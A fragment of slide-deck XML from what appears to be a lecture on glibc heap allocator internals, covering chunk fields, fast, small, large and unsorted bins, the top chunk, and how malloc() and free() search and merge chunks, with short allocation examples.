            <a:ext cx="1396200" cy="1343700"/>
            <a:chOff x="3698425" y="2102425"/>
            <a:chExt cx="1396200" cy="1343700"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2255" name="Shape 2255"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3698425" y="21024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prev_size</a:t>
              </a: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3698425" y="23517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size=32</a:t>
              </a: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3698425" y="26010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fd=0x804b010</a:t>
              </a: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3698425" y="28503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bk</a:t>
              </a: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3698425" y="3099625"/>
              <a:ext cx="1396200" cy="3465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unused</a:t>
              </a:r>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2260" name="Shape 2260"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="2247" idx="2"/>
            <a:endCxn id="2255" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5475300" y="1703275"/>
            <a:ext cx="0" cy="2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61" name="Shape 2261"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4777200" y="3574725"/>
            <a:ext cx="1396200" cy="1343700"/>
            <a:chOff x="3698425" y="2102425"/>
            <a:chExt cx="1396200" cy="1343700"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2262" name="Shape 2262"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3698425" y="21024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prev_size</a:t>
              </a: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3698425" y="23517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size=32</a:t>
              </a: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3698425" y="26010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fd=NULL</a:t>
              </a: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3698425" y="28503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bk</a:t>
              </a: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3698425" y="3099625"/>
              <a:ext cx="1396200" cy="3465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unused</a:t>
              </a:r>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2267" name="Shape 2267"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="2245" idx="2"/>
            <a:endCxn id="2249" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124500" y="1703275"/>
            <a:ext cx="0" cy="2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8" name="Shape 2268"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="2257" idx="1"/>
            <a:endCxn id="2262" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4777200" y="2590400"/>
            <a:ext cx="600" cy="11091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9" name="Shape 2269"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6063000" y="1453975"/>
            <a:ext cx="1175400" cy="24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270" name="Shape 2270"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6212025" y="3574725"/>
            <a:ext cx="1175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0x804b010</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2271" name="Shape 2271"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1275875" y="1967150"/>
            <a:ext cx="10686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0x804b000</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2272" name="Shape 2272"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228654" y="1453975"/>
            <a:ext cx="22653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main_arena.fastbinsY</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2273" name="Shape 2273"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2397900" y="1111200"/>
            <a:ext cx="13962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size=16</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2274" name="Shape 2274"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3601800" y="1111200"/>
            <a:ext cx="13962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size=24</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2275" name="Shape 2275"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4777200" y="1111200"/>
            <a:ext cx="13962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size=32</a:t>
            </a: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Shape 2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bins</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2281" name="Shape 2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Circular double linked list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63 small bins in total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16, 24, ..., 508 bytes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chunk sizes are the same in each bin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chunk size &lt; 512 bytes</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk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First In First Out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Shape 2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bins</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2287" name="Shape 22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Circular double linked list</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk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63 small bins in total</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1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16, 24, ..., 508 bytes</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1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chunk sizes are the different in each bin</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk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chunk size &gt;= 512 bytes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First In First Out</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk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chunks are ordered according to the size, from big to small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Shape 2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Unsorted bin</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2293" name="Shape 2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Circular double linked list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 bin in total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chunk size &gt; 64 bytes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a chunk(not fast chunk) is freed, it first goes into the unsorted bin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Shape 2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Unsorted bins and small bins</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2299" name="Shape 2299"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1638600" y="1629696"/>
            <a:ext cx="1175400" cy="37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fd=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0x804b000</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2300" name="Shape 2300"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2814000" y="1629697"/>
            <a:ext cx="1175400" cy="37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bk=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0x804b3a8</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2301" name="Shape 2301"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3989400" y="1629697"/>
            <a:ext cx="1175400" cy="37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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2302" name="Shape 2302"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2195589" y="2333675"/>
            <a:ext cx="1248202" cy="1097937"/>
            <a:chOff x="1347625" y="2053825"/>
            <a:chExt cx="1527600" cy="1343700"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2303" name="Shape 2303"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1347625" y="20538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prev_size</a:t>
              </a:r>
              <a:endParaRPr sz="1200"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1347625" y="23031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size=104</a:t>
              </a:r>
              <a:endParaRPr sz="1200"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1347625" y="25524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fd=0x804b4e0</a:t>
              </a:r>
              <a:endParaRPr sz="1200"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1347625" y="28017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bk=0xb7fd8430</a:t>
              </a:r>
              <a:endParaRPr sz="1200"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1347625" y="3051025"/>
              <a:ext cx="1527600" cy="3465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unused</a:t>
              </a:r>
              <a:endParaRPr sz="1200"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2308" name="Shape 2308"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5164800" y="1629697"/>
            <a:ext cx="1175400" cy="37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fd=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0x804b138</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2309" name="Shape 2309"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6340200" y="1629697"/>
            <a:ext cx="1175400" cy="37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bk=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0x804b270</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2310" name="Shape 2310"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2195589" y="3763863"/>
            <a:ext cx="1248202" cy="1097937"/>
            <a:chOff x="1347625" y="2053825"/>
            <a:chExt cx="1527600" cy="1343700"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2311" name="Shape 2311"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1347625" y="20538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prev_size</a:t>
              </a:r>
              <a:endParaRPr sz="1200"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1347625" y="23031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size=1008</a:t>
              </a:r>
              <a:endParaRPr sz="1200"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1347625" y="25524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fd=0x804b000</a:t>
              </a:r>
              <a:endParaRPr sz="1200"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1347625" y="28017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bk=0x804b3a8</a:t>
              </a:r>
              <a:endParaRPr sz="1200"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1347625" y="3051025"/>
              <a:ext cx="1527600" cy="3465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unused</a:t>
              </a:r>
              <a:endParaRPr sz="1200"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2316" name="Shape 2316"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2644600" y="2016875"/>
            <a:ext cx="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7" name="Shape 2317"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2644600" y="3453417"/>
            <a:ext cx="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8" name="Shape 2318"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3016975" y="2032350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9" name="Shape 2319"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3016975" y="34612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0" name="Shape 2320"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="5400000">
            <a:off x="926075" y="3013650"/>
            <a:ext cx="2273100" cy="264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21" name="Shape 2321"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5725739" y="2333675"/>
            <a:ext cx="1248202" cy="1097937"/>
            <a:chOff x="1347625" y="2053825"/>
            <a:chExt cx="1527600" cy="1343700"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2322" name="Shape 2322"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1347625" y="20538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prev_size</a:t>
              </a:r>
              <a:endParaRPr sz="1200"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1347625" y="23031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size=104</a:t>
              </a:r>
              <a:endParaRPr sz="1200"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1347625" y="25524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fd=0x804b270</a:t>
              </a:r>
              <a:endParaRPr sz="1200"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1347625" y="28017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bk=0xb7fd8490</a:t>
              </a:r>
              <a:endParaRPr sz="1200"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1347625" y="3051025"/>
              <a:ext cx="1527600" cy="3465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unused</a:t>
              </a:r>
              <a:endParaRPr sz="1200"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2327" name="Shape 2327"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5762139" y="3748325"/>
            <a:ext cx="1248202" cy="1097937"/>
            <a:chOff x="1347625" y="2053825"/>
            <a:chExt cx="1527600" cy="1343700"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2328" name="Shape 2328"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1347625" y="20538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prev_size</a:t>
              </a:r>
              <a:endParaRPr sz="1200"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1347625" y="23031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size=104</a:t>
              </a:r>
              <a:endParaRPr sz="1200"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1347625" y="25524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fd=0x804b138</a:t>
              </a:r>
              <a:endParaRPr sz="1200"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1347625" y="2801725"/>
              <a:ext cx="15276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bk=0xb7fd8490</a:t>
              </a:r>
              <a:endParaRPr sz="1200"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1347625" y="3051025"/>
              <a:ext cx="1527600" cy="3465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unused</a:t>
              </a:r>
              <a:endParaRPr sz="1200"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2333" name="Shape 2333"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6125150" y="2024550"/>
            <a:ext cx="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4" name="Shape 2334"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6125150" y="3453425"/>
            <a:ext cx="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5" name="Shape 2335"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="6559575" y="2023988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6" name="Shape 2336"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="6559575" y="345342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7" name="Shape 2337"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="5400000">
            <a:off x="4493600" y="3005888"/>
            <a:ext cx="2273100" cy="264000"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd fmla="val -6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8" name="Shape 2338"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7515600" y="1629697"/>
            <a:ext cx="1175400" cy="37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2339" name="Shape 2339"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1722000" y="1077688"/>
            <a:ext cx="2195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 1 - Unsorted bin</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2340" name="Shape 2340"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5252150" y="1077700"/>
            <a:ext cx="2195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 13 - Small bin</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2341" name="Shape 2341"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="99601" y="1690900"/>
            <a:ext cx="1622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main_arena.bins</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2342" name="Shape 2342"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1713600" y="1403674"/>
            <a:ext cx="1025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0xb7fd8438</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2343" name="Shape 2343"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2889000" y="1400388"/>
            <a:ext cx="1025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0xb7fd843c</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2344" name="Shape 2344"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5239800" y="1384875"/>
            <a:ext cx="1025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0xb7fd8498</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2345" name="Shape 2345"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6415200" y="1396200"/>
            <a:ext cx="1025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0xb7fd849c</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2346" name="Shape 2346"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="2313" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="2447941" y="2984470"/>
            <a:ext cx="2284500" cy="29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7" name="Shape 2347"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="6050891" y="2984470"/>
            <a:ext cx="2284500" cy="292800"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd fmla="val 9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Shape 23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chunk</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2353" name="Shape 23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chunk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Doesn't belong to any bins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At the highest address of an arena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Is used to service user request when there is NO free blocks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When split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User chunk(of requested size)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Remainder chunk(of remaining size, becomes the new top)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Last_remainder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Remainder from the most recent split of a small request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pop &lt;reg32&gt;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pop &lt;mem&gt;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Examples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pop edi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pop [ebx]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Shape 23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malloc()</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2359" name="Shape 23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for fast chunks in fast bins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for chunk of exact size in small bins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Check last_remainder in unsorted bin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if last_remainder is big enough, split it and mark the remaining chunk as the new last_remainder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Search unsorted bin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return the chunk of exact size, put other chunks into small/large bins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Search small bins and large bins for best-fit chunk(not exact size)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top chunk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Shape 2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free()</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2365" name="Shape 23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Security Check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fast chunk, put into fastbin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previous chunk 	is free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unlink previous chunk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put merged chunk into unsorted bin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next chunk is top chunk, merge current chunk to the top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next chunk is free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unlink next chunk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put merged chunk into unsorted bin</a:t>
            </a:r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example</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2371" name="Shape 2371"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="368075" y="1120825"/>
            <a:ext cx="2842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*A, *B, *C, *D;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A = malloc(0x100 - 8);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B = malloc(0x100 - 8);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C = malloc(0x100 - 8);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D = malloc(0x100 - 8);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free(C);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malloc(0x80 - 8);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free(B);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4864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2" name="Shape 2372"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4407350" y="1648000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373" name="Shape 2373"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4407350" y="2220700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374" name="Shape 2374"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4407350" y="2781625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375" name="Shape 2375"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4407350" y="3354325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376" name="Shape 2376"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="58173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unsorted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377" name="Shape 2377"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7205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small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378" name="Shape 2378"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4428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Shape 23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example</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2384" name="Shape 2384"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="368075" y="1120825"/>
            <a:ext cx="2842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*A, *B, *C, *D;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free(A);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free(C);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malloc(0x80 - 8);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free(B);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4864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5" name="Shape 2385"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4407350" y="1648000"/>
            <a:ext cx="11115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 A'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386" name="Shape 2386"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4407350" y="2220700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387" name="Shape 2387"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4407350" y="2781625"/>
            <a:ext cx="11115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 C'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388" name="Shape 2388"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4407350" y="3354325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389" name="Shape 2389"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="58173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unsorted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390" name="Shape 2390"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7205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small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391" name="Shape 2391"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4428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sp>
        <p:nvSpPr>
          <p:cNvPr id="2392" name="Shape 2392"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6216850" y="1811850"/>
            <a:ext cx="4347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A'</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2393" name="Shape 2393"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6216850" y="2435800"/>
            <a:ext cx="4347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C'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Shape 2398"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6216850" y="1811850"/>
            <a:ext cx="4347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C'</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2399" name="Shape 23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example</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2400" name="Shape 2400"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="368075" y="1120825"/>
            <a:ext cx="2842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*A, *B, *C, *D;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free(C);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A = malloc(0x100 - 8);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malloc(0x80 - 8);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free(B);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4864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1" name="Shape 2401"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4407350" y="1648000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02" name="Shape 2402"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4407350" y="2220700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03" name="Shape 2403"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4407350" y="2781625"/>
            <a:ext cx="11115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 C'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04" name="Shape 2404"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4407350" y="3354325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05" name="Shape 2405"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="58173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unsorted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406" name="Shape 2406"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7205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small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407" name="Shape 2407"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4428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Shape 2412"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6216850" y="1811850"/>
            <a:ext cx="4347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C'</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2413" name="Shape 24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example</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2414" name="Shape 2414"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="368075" y="1120825"/>
            <a:ext cx="2842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*A, *B, *C, *D;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free(C);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free(A);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malloc(0x80 - 8);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free(B);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4864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5" name="Shape 2415"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4407350" y="1648000"/>
            <a:ext cx="11115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 A'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16" name="Shape 2416"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4407350" y="2220700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17" name="Shape 2417"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4407350" y="2781625"/>
            <a:ext cx="11115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 C'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18" name="Shape 2418"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4407350" y="3354325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19" name="Shape 2419"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="58173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unsorted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420" name="Shape 2420"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7205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small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421" name="Shape 2421"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4428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sp>
        <p:nvSpPr>
          <p:cNvPr id="2422" name="Shape 2422"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6216850" y="2435800"/>
            <a:ext cx="4347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A'</a:t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Shape 2427"/>
          <p:cNvSpPr/>
